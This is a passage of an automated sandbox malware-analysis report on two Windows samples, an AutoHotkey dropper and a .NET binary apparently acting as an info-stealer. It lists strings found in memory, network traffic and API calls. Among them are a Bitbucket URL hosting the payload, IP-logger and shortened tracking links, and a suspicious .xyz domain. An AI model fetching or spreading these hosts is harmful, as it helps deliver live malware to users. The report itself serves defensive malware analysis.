                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz/
                    Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz4
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz:80/
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/is.gd
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exelq
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
                    Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpString found in binary or memory: https://iplogger.org/1Spbs7
                    Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Spbs7%A_AppData%
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Spbs7e
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/y
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/b
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpString found in binary or memory: https://is.gd/nKi5S3
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3$
                    Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3%A_AppData%
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3H
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363595455.0000000002BEF000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363606561.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: kS2dqbsDwD.exeString found in binary or memory: https://sectigo.com/CPS0C
                    Source: kS2dqbsDwD.exeString found in binary or memory: https://sectigo.com/CPS0D
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,0_2_00000001400053A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData,0_2_0000000140005280
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,0_2_0000000140042E80
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140011052 GetKeyboardState,0_2_0000000140011052
                    Source: 325.exe, 00000002.00000002.303820429.0000000000B58000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW,0_2_00000001400018BA

                    System Summary:

                    barindex
                    .NET source code contains very large stringsShow sources
                    Source: 325.exe.0.dr, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Sample or dropped binary is a compiled AutoHotkey binaryShow sources
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeWindow found: window name: AutoHotkeyJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW,0_2_0000000140043AD0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW,0_2_000000014004438A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043BF6 NtdllDefWindowProc_W,0_2_0000000140043BF6
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043C50 NtdllDefWindowProc_W,0_2_0000000140043C50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W,0_2_0000000140043C8B
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043CAC NtdllDefWindowProc_W,0_2_0000000140043CAC
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043CD9 NtdllDefWindowProc_W,0_2_0000000140043CD9
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle,0_2_00000001400492B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00000001400624E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB070_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400190300_2_0000000140019030
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400602900_2_0000000140060290
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400184C00_2_00000001400184C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400045300_2_0000000140004530
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400018BA0_2_00000001400018BA
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043AD00_2_0000000140043AD0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140036D500_2_0000000140036D50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140014FF00_2_0000000140014FF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400A7FF80_2_00000001400A7FF8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400490400_2_0000000140049040
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400530500_2_0000000140053050
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D0800_2_000000014004D080
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400081400_2_0000000140008140
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400831500_2_0000000140083150
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400861F00_2_00000001400861F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003C2200_2_000000014003C220
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400422400_2_0000000140042240
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002B25C0_2_000000014002B25C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000C2600_2_000000014000C260
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400482700_2_0000000140048270
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004B2700_2_000000014004B270
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008B2800_2_000000014008B280
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000A2B00_2_000000014000A2B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400222C00_2_00000001400222C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400132C00_2_00000001400132C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004C2D00_2_000000014004C2D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400302E00_2_00000001400302E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000F2E00_2_000000014000F2E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003A3000_2_000000014003A300
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400203160_2_0000000140020316
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E3300_2_000000014005E330
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003B32A0_2_000000014003B32A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014006C33D0_2_000000014006C33D
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400333800_2_0000000140033380
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400963900_2_0000000140096390
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400563A00_2_00000001400563A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400883F00_2_00000001400883F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B94200_2_00000001400B9420
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004A4800_2_000000014004A480
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400424B00_2_00000001400424B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400414B00_2_00000001400414B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B04B40_2_00000001400B04B4
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400344D00_2_00000001400344D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400595100_2_0000000140059510
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E5800_2_000000014005E580
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002D5850_2_000000014002D585
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014001D5A90_2_000000014001D5A9
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400695C00_2_00000001400695C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400465D00_2_00000001400465D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400665E00_2_00000001400665E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400236300_2_0000000140023630
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400586500_2_0000000140058650
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003B6540_2_000000014003B654
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400AE6600_2_00000001400AE660
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014006D6A00_2_000000014006D6A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C26980_2_00000001400C2698
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C26B00_2_00000001400C26B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C26A80_2_00000001400C26A8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400096E00_2_00000001400096E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400567190_2_0000000140056719
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400577A00_2_00000001400577A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400727F00_2_00000001400727F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400548600_2_0000000140054860
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E8F00_2_000000014005E8F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400309100_2_0000000140030910
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014006C9200_2_000000014006C920
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400069380_2_0000000140006938
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000693C0_2_000000014000693C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400069400_2_0000000140006940
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D9900_2_000000014004D990
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400059D00_2_00000001400059D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005F9F20_2_000000014005F9F2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140071A100_2_0000000140071A10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140019A2E0_2_0000000140019A2E
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400BBA400_2_00000001400BBA40
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140047AB00_2_0000000140047AB0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060AF00_2_0000000140060AF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140049B400_2_0000000140049B40
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B7B9C0_2_00000001400B7B9C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002FBFC0_2_000000014002FBFC
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140059C000_2_0000000140059C00
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140055C100_2_0000000140055C10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000CC100_2_000000014000CC10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005FC250_2_000000014005FC25
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140038C500_2_0000000140038C50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004BC600_2_000000014004BC60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400BDCA80_2_00000001400BDCA8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008BCD00_2_000000014008BCD0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140041CD10_2_0000000140041CD1
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140045CF00_2_0000000140045CF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400A7D2C0_2_00000001400A7D2C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004FD300_2_000000014004FD30
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003ED700_2_000000014003ED70
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140079D900_2_0000000140079D90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140065D900_2_0000000140065D90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400A0DC00_2_00000001400A0DC0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002ADE60_2_000000014002ADE6
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140035E600_2_0000000140035E60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140090E700_2_0000000140090E70
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140067E620_2_0000000140067E62
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140051E800_2_0000000140051E80
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140042E800_2_0000000140042E80
